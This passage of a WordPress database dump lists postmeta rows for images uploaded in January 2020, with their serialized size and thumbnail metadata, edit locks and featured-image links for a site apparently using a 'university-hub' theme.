(15553, 6616, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-09.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-09-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-09-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15562, 6618, '_edit_lock', '1580276446:14'),
(15563, 6618, '_edit_last', '14'),
(15564, 6619, '_wp_attached_file', '2020/01/290162-10.jpg'),
(15565, 6619, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-10-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-10-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-10-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-10-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15566, 6618, '_thumbnail_id', '6619'),
(15569, 6618, '_hide_featured', NULL),
(15575, 6622, '_wp_attached_file', '2020/01/290162-11.jpg'),
(15576, 6622, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-11.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-11-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-11-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15584, 6625, '_wp_attached_file', '2020/01/290162-12.jpg'),
(15585, 6625, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-12-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-12-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15594, 6627, '_edit_lock', '1580276938:14'),
(15595, 6627, '_edit_last', '14'),
(15596, 6628, '_wp_attached_file', '2020/01/211162-13.png'),
(15597, 6628, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/211162-13.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-13-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-13-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-13-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-13-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15598, 6627, '_thumbnail_id', '6631'),
(15601, 6627, '_hide_featured', NULL),
(15616, 6631, '_wp_attached_file', '2020/01/290162-13.jpg'),
(15617, 6631, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-13.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-13-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-13-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-13-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-13-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15624, 6633, '_wp_attached_file', '2020/01/290162-14.jpg'),
(15625, 6633, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-14.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-14-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-14-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-14-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-14-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15630, 6635, '_edit_lock', '1580277390:14'),
(15631, 6635, '_edit_last', '14'),
(15632, 6636, '_wp_attached_file', '2020/01/290162-15.jpg'),
(15633, 6636, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-15.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-15-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-15-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-15-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-15-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15634, 6635, '_thumbnail_id', '6633'),
(15637, 6635, '_hide_featured', NULL),
(15640, 6638, '_edit_lock', '1580277310:14'),
(15641, 6638, '_edit_last', '14'),
(15642, 6639, '_wp_attached_file', '2020/01/290162-16.jpg'),
(15643, 6639, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-16.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-16-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-16-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-16-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-16-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15644, 6638, '_thumbnail_id', '6636'),
(15647, 6638, '_hide_featured', NULL),
(15659, 6641, '_edit_lock', '1580277483:14'),
(15660, 6641, '_edit_last', '14'),
(15661, 6641, '_thumbnail_id', '6639'),
(15664, 6641, '_hide_featured', NULL),
(15667, 6643, '_edit_lock', '1580277536:14'),
(15668, 6643, '_edit_last', '14'),
(15669, 6644, '_wp_attached_file', '2020/01/290162-17.jpg'),
(15670, 6644, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-17.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-17-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-17-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-17-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-17-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15671, 6643, '_thumbnail_id', '6644'),
(15674, 6643, '_hide_featured', NULL),
(15679, 6646, '_edit_lock', '1580277580:14'),
(15680, 6646, '_edit_last', '14'),
(15681, 6647, '_wp_attached_file', '2020/01/290162-18.jpg'),
(15682, 6647, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-18.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-18-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-18-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-18-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-18-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15683, 6646, '_thumbnail_id', '6647'),
(15686, 6646, '_hide_featured', NULL),
(15689, 6649, '_edit_lock', '1580277664:14'),
(15690, 6649, '_edit_last', '14'),
(15691, 6650, '_wp_attached_file', '2020/01/290162-19.jpg'),
(15692, 6650, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-19.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-19-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-19-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-19-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-19-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15693, 6649, '_thumbnail_id', '6650'),
(15696, 6649, '_hide_featured', NULL),
(15701, 6652, '_edit_lock', '1580277731:14'),
(15702, 6652, '_edit_last', '14'),
(15703, 6653, '_wp_attached_file', '2020/01/290162-20.jpg'),
(15704, 6653, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-20.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-20-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-20-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-20-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-20-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15705, 6652, '_thumbnail_id', '6653'),
(15708, 6652, '_hide_featured', NULL),
(15711, 6655, '_edit_lock', '1580277773:14'),
(15712, 6655, '_edit_last', '14'),
(15713, 6656, '_wp_attached_file', '2020/01/290162-21.jpg'),
(15714, 6656, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-21.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-21-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-21-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-21-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-21-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15715, 6655, '_thumbnail_id', '6656'),
(15718, 6655, '_hide_featured', NULL),
(15722, 6659, '_wp_attached_file', '2020/01/290162-22.jpg'),
(15723, 6659, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-22.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-22-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-22-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15731, 6662, '_wp_attached_file', '2020/01/290162-23.jpg'),
(15732, 6662, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-23.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-23-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-23-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15743, 6664, '_edit_lock', '1580278005:14'),
(15744, 6664, '_edit_last', '14'),
(15745, 6665, '_wp_attached_file', '2020/01/290162-24.jpg'),
(15746, 6665, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-24.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-24-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-24-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-24-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-24-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"k